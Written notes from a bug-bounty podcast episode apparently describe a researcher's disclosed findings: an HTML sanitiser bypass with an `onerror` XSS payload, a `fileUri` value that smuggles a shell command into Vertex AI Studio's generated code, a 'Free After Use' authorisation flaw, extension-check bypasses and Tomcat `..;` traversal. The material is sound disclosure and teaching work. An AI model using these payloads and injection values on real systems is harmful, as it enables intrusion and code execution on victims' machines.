Critical Thinking - Bug Bounty Podcast

[HackerNotes Ep. 130] Minecraft Hacks to Google Hacking Star

Valentino shares his journey from hacking Minecraft to becoming a Google hunter. He talks us through several bugs, including an HTML sanitiser bypass and .NET deserialisation, and highlights the hyper-creative approaches he tends to employ.

Hacker TL;DR

- HTML sanitiser bypass through tag nesting depth: Exploit sanitisers by wrapping malicious tags in multiple unclosed parent tags, e.g. `<p><p><p><p><p><audio/src/onerror=alert(1)>`. The success rate may depend on the ratio of nesting depth to content length, which suggests the sanitiser has limitations with deeply nested structures.

- Command injection via unescaped URI fields: Look for input fields that get embedded verbatim into generated code snippets. In Vertex AI Studio, a malicious `fileUri` in a shared prompt allowed injection with newline escapes (`"fileUri": "http://www.google.com/\"\nEOF\nid\n<< EOF\n-"`) that executed when users ran the generated API code.

- "Free After Use" authorisation pattern flaw: Watch for authorisation bypasses where privileged access temporarily changes resource state. When authorisation logic changes object visibility after privileged access (`if authorized { publish(content) }`), a temporary window of public access can open. This creates a timing vulnerability like "Use After Free", but freeing after use.

- File extension validation bypasses: Test URL fragment characters (`.html#.png`) that may bypass extension checks when the filename is later appended to a URL. Also try uppercase variations (`.Xml`) against blacklist-based extension filters that might be case-sensitive.

Keep your network secure without lifting a finger - ThreatLocker® Patch Management scans, tests, and deploys critical patches automatically.

Ditch alert overload and zero-day worries with a single, unified console that consolidates every update.

Customize policies by machine, group, or timing, and defer non-urgent patches up to 90 days.

Say goodbye to patching headaches - try ThreatLocker today and forget patch management for good.

Bring a Bug!



Valentino came across an Apache Tomcat instance with default credentials. You might have seen Orange Tsai's research showing that paths can be traversed on Tomcat with `..;`.
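Here is a simplified model of why `..;` works. A front-end component normalises the path without understanding `;` path parameters. A Tomcat-style back end strips `;...` from each segment before resolving `..`. This is a sketch under stated assumptions, not Tomcat's actual code. The `/public/` rule and the function names are hypothetical.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// frontEndAllows models a hypothetical proxy rule that only forwards paths
// under /public/. path.Clean resolves "." and ".." but treats "..;" as an
// ordinary segment name, so the prefix check still passes.
func frontEndAllows(p string) bool {
	return strings.HasPrefix(path.Clean(p), "/public/")
}

// backEndPath is a simplified model of Tomcat-style handling: drop any
// ";param" suffix from each segment, then resolve "." and "..".
func backEndPath(p string) string {
	segs := strings.Split(p, "/")
	for i, s := range segs {
		if j := strings.IndexByte(s, ';'); j >= 0 {
			segs[i] = s[:j]
		}
	}
	return path.Clean(strings.Join(segs, "/"))
}

func main() {
	req := "/public/..;/manager/html"
	fmt.Println(frontEndAllows(req)) // true
	fmt.Println(backEndPath(req))    // /manager/html
}
```

The two layers disagree about what the same string means. The front end sees a harmless `/public/` path, while the back end resolves it to the Manager.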

So he could log in to the Tomcat Manager with admin:admin and traverse paths freely, but file uploads were only allowed from localhost. He then figured out that he could use the JMX Proxy servlet, which exposes Tomcat's internal state (its MBeans) over HTTP, to get RCE.
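For context, the JMX Proxy servlet lives under the Manager app at `/manager/jmxproxy/` and accepts a `qry` parameter to look up MBeans. The sketch below only builds a read-only query request with Go's `net/http`. It does not reproduce Valentino's RCE chain, which the notes don't detail. The host, credentials and MBean name are placeholders. It also assumes the Manager uses HTTP Basic auth, as in Tomcat's default setup.

```go
package main

import (
	"fmt"
	"net/http"
	"net/url"
)

// jmxQueryRequest builds, but does not send, a read-only "qry" request to
// Tomcat's JMX Proxy servlet. All arguments are placeholders.
func jmxQueryRequest(base, user, pass, query string) (*http.Request, error) {
	u, err := url.Parse(base)
	if err != nil {
		return nil, err
	}
	u.Path = "/manager/jmxproxy/"
	u.RawQuery = url.Values{"qry": {query}}.Encode()
	req, err := http.NewRequest(http.MethodGet, u.String(), nil)
	if err != nil {
		return nil, err
	}
	// Assumes HTTP Basic auth, as in the Manager app's default configuration.
	req.SetBasicAuth(user, pass)
	return req, nil
}

func main() {
	req, err := jmxQueryRequest("http://tomcat.example:8080", "admin", "admin", "Catalina:type=Server")
	if err != nil {
		panic(err)
	}
	fmt.Println(req.Method, req.URL.String())
	fmt.Println(req.Header.Get("Authorization"))
}
```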

About Valentino

Valentino is based in Argentina and currently studies Computer Science at the University of Buenos Aires. He got into hacking when he was around 12, after losing interest in just playing Minecraft. He started running servers and digging into how minigames were structured behind the scenes. That's when he found his first real bug: figuring out how to connect directly to internal minigame servers and skip the usual authentication flow.

The issue was in how BungeeCord proxies mapped multiple servers. Most minigame instances weren't protected properly, and if you knew the IPs, you could just walk in. With tools like Nmap, he scanned ASN ranges to find exposed Minecraft servers, then abused the trust model between them to move laterally and escalate privileges. At one point, he had full `*` permissions through PermissionsEx by spoofing origin IPs and chaining commands like `/server another-minigame`.

Eventually, he even built a fake auth server to bypass premium setups entirely and reach unprotected server lobbies. Along the way, he picked up more tricks like exploiting public DoS flaws in common plugins, and started understanding the defensive side too by patching the same issues on his own setups.

Later, he moved into CTFs, which gave him a more structured environment to keep learning. That's where the hacking got serious. He earned the OSCP, and his skills kept scaling until he landed his first pentesting job at 18.

While working as a pentester, an ex-employee invited him to MercadoLibre’s private program on HackerOne. That’s where he started hunting bugs on the side, finding issues like open redirects, XSS, and IDORs.

He eventually made his way to Google’s VRP after spotting a tweet inviting hackers to try out some AI-related challenges. After solving them and submitting the form, he got invited to a bugSWAT event in Las Vegas, where he was awarded “Best Newcomer.”

Justin asked Valentino for a tip for people who want to get started hacking on Google, and his answer was pretty crazy: close the proxy and pay attention to what's happening in the application. There are a lot of different types of hackers, and this tip can be valuable if it fits your hacking style. Closing the proxy was what enabled him to Critical Think better when hacking.

While testing the messaging system between buyers and sellers on MercadoLibre, he noticed that messages contained HTML markup (e.g. `<p>Claim #123456789</p>`). This implied some HTML tags were allowed, pointing to a whitelist-based sanitiser.

- Tags like `<p>`, `<h1>` and `<h2>` were allowed.
- Tags like `<img>`, `<audio>`, `<script>` and others were disallowed.

A sanitiser was in place, but its behaviour revealed something odd:

- Sending `<p><p><img>` → the `<img>` tag wasn't removed.
- Sending just `<img>` → it got stripped.

This suggested the sanitiser could be confused by nested or unbalanced HTML structures.

By repeatedly testing allowed and disallowed tags, he realised that wrapping disallowed tags inside enough unclosed <p> tags could trick the sanitiser.

Using this logic:

```html
<p><p><p><p><p><audio/src/onerror=alert(1)>
```

Even more interesting: the success rate depended on the number of open `<p>` tags. This behaviour was likely due to the sanitiser parsing the DOM based on message length or tag depth, possibly something like `message_length / 2`.

Command Injection in Vertex AI Studio ("Get Code" feature)

Valentino found a command injection in Vertex AI Studio’s prompt management feature.

The issue was in how the `fileUri` field of imported prompts was handled. When a prompt included an image via `fileUri`, the URI was later embedded verbatim into the code snippet generated by the “Get code” feature, without escaping special characters.

This made it possible to inject arbitrary Bash/Python code just by crafting a malicious `fileUri`. The resulting code snippet (meant to help users call Google APIs) would then contain the injected commands, which executed as soon as the snippet was run.

Because prompt files could be shared publicly, any user importing a malicious prompt and using the “Get code” functionality would unknowingly copy-paste or run compromised code.

Valentino’s final payload looked like this:

```
"fileUri": "http://www.google.com/\"\nEOF\nid\n<< EOF\n-"
```

And the generated code:

```bash
cat << EOF > request.json
{
  "contents": [
    {
      "role": "user",
      "parts": [
        {
          "fileData": {
            "mimeType": "image/jpeg",
            "fileUri": "http://www.google.com/"
EOF
id
<< EOF
-"
          }
        }
      ]
    }
  ]
<..>
```

Valentino realised the injection also worked in the Python version of the generated code, confirming the issue wasn’t limited to Bash snippets.

He then started thinking about practical impact: since the bug required the victim to manually use the “Get code” output, he wondered whether Google would accept it. The attack chain would be stronger if it could be triggered via a file upload rather than relying only on manual interaction.

That’s when he pivoted to Vertex AI Studio’s prompt management feature, which allows importing prompts via JSON files. He exported a valid prompt, modified the fileUri field to include his payload, and re-imported it successfully.

The malicious prompt file looked like this:

```json
{
  <..>
  "type": "multimodal_freeform",
  "prompt": {
    "parts": [
      {
        "fileData": {
          "mimeType": "image/jpeg",
          "fileUri": "http://www.google.com/\"\nEOF\nid\n<< EOF\n-"
        }
      }
    ]
  },
  "model": "google/gemini-2.0-flash-001"
}
```

He was awarded $3133.7 for this bug.
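On the defensive side, the import step is a natural place to reject such values. The sketch below is a hypothetical validator, not Vertex AI's, and it models only the prompt fields shown above. It rejects `fileUri` values containing quotes, backslashes or control characters, then requires a parseable URI with an expected scheme. The `http`/`https`/`gs` list is an assumption. Validation like this complements, rather than replaces, escaping at the point where the code snippet is generated.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/url"
	"strings"
)

// promptFile models only the fields of the exported prompt that matter here;
// unknown fields such as "type" and "model" are ignored by json.Unmarshal.
type promptFile struct {
	Prompt struct {
		Parts []struct {
			FileData *struct {
				MimeType string `json:"mimeType"`
				FileURI  string `json:"fileUri"`
			} `json:"fileData"`
		} `json:"parts"`
	} `json:"prompt"`
}

// validateFileURI is a hypothetical import-time check.
func validateFileURI(raw string) error {
	if strings.ContainsAny(raw, "\"\\") {
		return fmt.Errorf("fileUri contains a quote or backslash")
	}
	for _, r := range raw {
		if r < 0x20 || r == 0x7f {
			return fmt.Errorf("fileUri contains a control character")
		}
	}
	u, err := url.Parse(raw)
	if err != nil {
		return err
	}
	switch u.Scheme {
	case "http", "https", "gs": // assumed allowlist of schemes
		return nil
	}
	return fmt.Errorf("unexpected scheme %q", u.Scheme)
}

// validatePrompt checks every fileData part of an imported prompt file.
func validatePrompt(data []byte) error {
	var p promptFile
	if err := json.Unmarshal(data, &p); err != nil {
		return err
	}
	for _, part := range p.Prompt.Parts {
		if part.FileData == nil {
			continue
		}
		if err := validateFileURI(part.FileData.FileURI); err != nil {
			return err
		}
	}
	return nil
}

func main() {
	malicious := `{"prompt":{"parts":[{"fileData":{"mimeType":"image/jpeg","fileUri":"http://www.google.com/\"\nEOF\nid\n<< EOF\n-"}}]}}`
	benign := `{"prompt":{"parts":[{"fileData":{"mimeType":"image/jpeg","fileUri":"gs://bucket/cat.jpg"}}]}}`
	fmt.Println(validatePrompt([]byte(malicious)))
	fmt.Println(validatePrompt([]byte(benign)))
}
```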

Valentino discovered a logic flaw where content became publicly accessible after being viewed by an authorised user, even though it was meant to stay private.

The simplified flow:

```
if is_published(content_id) {
    return content
} else if is_authorized(user_id) {
    publish(content) // makes it publicly available for ~15 minutes
    return content
} else {
    return 403
}
```

This means: once an authorised user accesses the content, it becomes “published” and any user (even unauthenticated) can access it during the temporary window.

He called this bug class “Free After Use”, a twist on “Use After Free”, where a privileged action causes a resource to become “free” after it is accessed. It's a good reminder to check how privilege checks interact with state transitions, especially in flows where one user's access affects what others can see.

If you want to play with it: https://github.com/valent1nee/vulnz/blob/main/free-after-use.go

Hacking tips/checks from Valentino

Issues in file extension validation components

A bypass that appends a “#” character to comment out the allowed file extension, because the filename was later appended to a URL and everything after “#” became the fragment: `.html#.png` → Stored XSS

A bypass using uppercase characters against extension validation that relied on a case-sensitive blacklist of disallowed extensions: `.Xml` → Stored XSS

That’s it for the week

As always, keep hacking!